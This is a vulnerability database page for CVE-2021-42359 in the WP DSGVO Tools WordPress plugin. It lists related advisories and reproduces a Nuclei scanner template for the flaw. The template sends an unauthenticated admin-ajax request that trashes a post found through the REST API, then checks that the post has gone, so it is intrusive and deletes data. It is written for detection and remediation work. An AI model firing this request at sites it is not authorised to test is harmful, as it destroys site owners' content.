| Reporter | Title | Published | Views | Family All 17 |
|---|---|---|---|---|
| CVE-2021-42359 | 19 Sep 202513:04 | – | circl | |
| WordPress 访问控制错误漏洞 | 5 Nov 202100:00 | – | cnnvd | |
| WordPress DSGVO Tools Access Control Error Vulnerability | 10 Nov 202100:00 | – | cnvd | |
| CVE-2021-42359 | 5 Nov 202119:44 | – | cve | |
| CVE-2021-42359 WP DSGVO Tools (GDPR) <= 3.1.23 Unauthenticated Arbitrary Post Deletion | 5 Nov 202119:44 | – | cvelist | |
| EUVD-2021-29330 | 5 Nov 202119:44 | – | euvd | |
| CVE-2021-42359 | 5 Nov 202121:15 | – | nvd | |
| CVE-2021-42359 | 5 Nov 202121:15 | – | osv | |
| WordPress WP DSGVO Tools (GDPR) plugin <= 3.1.22 - Unauthenticated Arbitrary Post Deletion vulnerability | 2 Nov 202100:00 | – | patchstack | |
| Design/Logic Flaw | 5 Nov 202121:15 | – | prion |
id: CVE-2021-42359
info:
name: WP DSGVO Tools (GDPR) <= 3.1.23 - Unauthenticated Arbitrary Post Deletion
author: daffainfo
severity: high
description: |
WP DSGVO Tools (GDPR) <= 3.1.23 had an AJAX action, ‘admin-dismiss-unsubscribe‘, which lacked a capability check and a nonce check and was available to unauthenticated users, and did not check the post type when deleting unsubscription requests. As such, it was possible for an attacker to permanently delete an arbitrary post or page on the site by sending an AJAX request with the “action” parameter set to “admin-dismiss-unsubscribe” and the “id” parameter set to the post to be deleted. Sending such a request would move the post to the trash, and repeating the request would permanently delete the post in question.
impact: |
Unauthenticated attackers can permanently delete arbitrary WordPress posts and pages by exploiting the unprotected admin-dismiss-unsubscribe AJAX action.
remediation: |
Upgrade to WP DSGVO Tools version 3.1.24 or later.
reference:
- https://www.wordfence.com/blog/2021/11/vulnerability-in-wp-dsgvo-tools-gdpr-plugin-allows-unauthenticated-page-deletion/
- https://nvd.nist.gov/vuln/detail/CVE-2021-42359
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
cvss-score: 7.5
cve-id: CVE-2021-42359
epss-score: 0.0393
epss-percentile: 0.89109
cwe-id: CWE-862,CWE-284
cpe: cpe:2.3:a:legalweb:wp_dsgvo_tools:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 5
vendor: legalweb
product: wp_dsgvo_tools
framework: wordpress
fofa-query: body="/wp-content/plugins/shapepress-dsgvo/"
publicwww-query: "/wp-content/plugins/shapepress-dsgvo/"
tags: cve,cve2021,wp,wordpress,wp-plugin,dsgvo,intrusive,vkev,vuln
flow: http(1) && http(2) && http(3)
http:
- method: GET
path:
- "{{BaseURL}}/{{route}}"
attack: clusterbomb
payloads:
route:
- "wp-json/wp/v2/posts"
- "?rest_route=/wp/v2/posts"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "[{\"id", "name\":")'
condition: and
internal: true
extractors:
- type: json
name: post_id
internal: true
json:
- '.[0].id'
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=admin-dismiss-unsubscribe&id={{post_id}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
internal: true
- method: GET
path:
- "{{BaseURL}}/{{route}}"
attack: clusterbomb
payloads:
route:
- "wp-json/wp/v2/posts"
- "?rest_route=/wp/v2/posts"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- '!contains(body, "\"id\":{{post_id}}")'
condition: and
# digest: 4a0a00473045022100e51bf357f6455d48388ec9f0a23c080aa534e5e13f6e3575b2cd437a46153b8402203333439947027b20aa00ca27ee942dcde0536c05dd4416ee6d3b1e14995c0145:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation